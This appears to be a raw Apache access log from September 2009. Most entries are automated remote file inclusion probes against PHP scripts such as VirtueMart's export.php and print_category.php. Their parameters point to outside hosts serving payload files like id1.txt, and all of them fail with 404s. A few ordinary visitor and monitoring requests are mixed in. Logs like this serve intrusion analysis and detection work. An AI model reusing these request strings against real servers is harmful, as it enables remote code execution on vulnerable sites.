222.122.72.216 - - [23/Sep/2009:06:59:27 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:29 -0400] "GET /logs/access_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:29 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:30 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:41 -0400] "GET /logs/error_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:48 -0400] "GET /logs/error_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:56 -0400] "GET /logs/access_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:56 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:06:59:56 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
211.115.89.7 - - [23/Sep/2009:07:00:03 -0400] "GET /logs/access_log.Q109082600//stphpbtnimage.php?STPHPLIB_DIR=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:00:04 -0400] "GET /logs//stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:00:04 -0400] "GET /logs/access_log.Q109082600%20%20//stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:00:04 -0400] "GET //stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:00:15 -0400] "GET /logs/access_log.Q109082600%20%20//stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:00:15 -0400] "GET //stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:00:15 -0400] "GET /logs//stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:07:00:16 -0400] "GET /logs/error_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
211.115.89.7 - - [23/Sep/2009:07:01:19 -0400] "GET /logs/access_log.Q109082600//stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:07:01:30 -0400] "GET /logs/access_log.Q109082000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
211.39.130.24 - - [23/Sep/2009:07:02:10 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:02:10 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:07:02:10 -0400] "GET /logs/access_log.Q109081900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:07:02:12 -0400] "GET /logs/access_log.Q109082600//stphpbtnimage.php?STPHPLIB_DIR=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:07:02:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:02:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:02:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [23/Sep/2009:07:02:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
211.39.130.24 - - [23/Sep/2009:07:02:43 -0400] "GET /logs/access_log.Q109082000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:07:02:56 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
209.59.12.99 - - [23/Sep/2009:07:03:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.19.69.149 - - [23/Sep/2009:07:03:27 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:27 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:27 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:34 -0400] "GET /errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:34 -0400] "GET /logs/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:34 -0400] "GET /logs/access_log.Q109071200/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:36 -0400] "GET /errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:36 -0400] "GET /logs/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:36 -0400] "GET /logs/access_log.Q109071200%20%20/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:37 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:37 -0400] "GET /logs/access_log.Q109062700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:37 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:38 -0400] "GET /errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:38 -0400] "GET /logs/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:38 -0400] "GET /logs/access_log.Q109071200/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:45 -0400] "GET /errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:45 -0400] "GET /logs/access_log.Q109071200%20%20/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:03:45 -0400] "GET /logs/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.19.69.149 - - [23/Sep/2009:07:03:54 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:07:04:38 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
64.221.88.162 - - [23/Sep/2009:07:04:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
64.221.88.162 - - [23/Sep/2009:07:04:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
64.221.88.162 - - [23/Sep/2009:07:04:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)"
67.225.196.53 - - [23/Sep/2009:07:05:57 -0400] "GET /errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:05:57 -0400] "GET /logs/access_log.Q109071200%20%20/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:05:57 -0400] "GET /logs/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:06:28 -0400] "GET /errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:06:28 -0400] "GET /logs/access_log.Q109071200%20%20/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:06:28 -0400] "GET /logs/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
188.120.34.217 - - [23/Sep/2009:07:07:39 -0400] "GET /logs/home.php?pagina=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.831"
188.120.34.217 - - [23/Sep/2009:07:07:39 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
188.120.34.217 - - [23/Sep/2009:07:07:39 -0400] "GET /home.php?pagina=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.831"
172.16.1.180 - - [23/Sep/2009:07:07:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:07:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:07:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
188.120.34.217 - - [23/Sep/2009:07:07:49 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://sayphoto.net/bbs//skin/zero_vote/images/zv/idv6.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
195.5.92.199 - - [23/Sep/2009:07:07:54 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
195.5.92.199 - - [23/Sep/2009:07:07:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
195.5.92.199 - - [23/Sep/2009:07:07:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
195.5.92.199 - - [23/Sep/2009:07:07:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5)"
222.122.72.216 - - [23/Sep/2009:07:08:10 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:08:10 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:08:10 -0400] "GET /logs/access_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:08:10 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:07:08:10 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:07:08:10 -0400] "GET /logs/access_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:07:08:13 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:08:13 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:08:13 -0400] "GET /logs/access_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
209.59.12.99 - - [23/Sep/2009:07:08:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.225.196.53 - - [23/Sep/2009:07:08:37 -0400] "GET /logs/access_log.Q109071200/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:07:09:10 -0400] "GET /logs/access_log.Q109071200/errors.php?error=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:07:09:15 -0400] "GET /logs/error_log.Q109080700%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
222.122.72.216 - - [23/Sep/2009:07:09:25 -0400] "GET /logs/access_log.Q109051700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:09:28 -0400] "GET /logs/access_log.Q109051700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
211.115.111.122 - - [23/Sep/2009:07:09:30 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:09:30 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:09:30 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:09:30 -0400] "GET /logs/access_log.Q109080800///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.122.72.216 - - [23/Sep/2009:07:09:32 -0400] "GET /logs/access_log.Q109051700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.122.72.216 - - [23/Sep/2009:07:09:39 -0400] "GET /logs/error_log.Q109080700%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
211.115.111.122 - - [23/Sep/2009:07:09:45 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:09:46 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:09:46 -0400] "GET /logs/access_log.Q109080800///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:09:47 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:07:09:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:09:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:09:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.72.216 - - [23/Sep/2009:07:10:02 -0400] "GET /logs/error_log.Q109080700%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.hackers2000.com.br/echo.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
89.187.131.186 - - [23/Sep/2009:07:11:15 -0400] "GET /logs//index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:11:15 -0400] "GET /logs/access_log.Q109062100%20%20//index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:11:19 -0400] "GET //index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:11:31 -0400] "GET /logs/access_log.Q109062700%20%20//index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Sep/2009:07:11:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:11:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Sep/2009:07:11:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.72.216 - - [23/Sep/2009:07:11:56 -0400] "GET /logs/error_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:07:12:02 -0400] "GET /logs/error_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
222.122.72.216 - - [23/Sep/2009:07:12:03 -0400] "GET /logs/error_log.Q109080700//bbs/include/print_category.php?setup[use_category]=1&dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
89.187.131.186 - - [23/Sep/2009:07:12:14 -0400] "GET //index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:12:14 -0400] "GET /logs//index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.187.131.186 - - [23/Sep/2009:07:12:14 -0400] "GET /logs/access_log.Q109062100//index1.php?p=http://zi0n.interfree.it/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:07:13:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.83 - - [23/Sep/2009:07:15:16 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
210.115.58.73 - - [23/Sep/2009:07:15:37 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:15:37 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:15:37 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
211.115.111.122 - - [23/Sep/2009:07:15:41 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:15:41 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.115.111.122 - - [23/Sep/2009:07:15:41 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.115.58.73 - - [23/Sep/2009:07:15:45 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:15:45 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:15:46 -0400] "GET /logs/access_log.Q109072200///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
211.115.111.122 - - [23/Sep/2009:07:15:55 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/id1v4.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
64.221.88.162 - - [23/Sep/2009:07:16:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
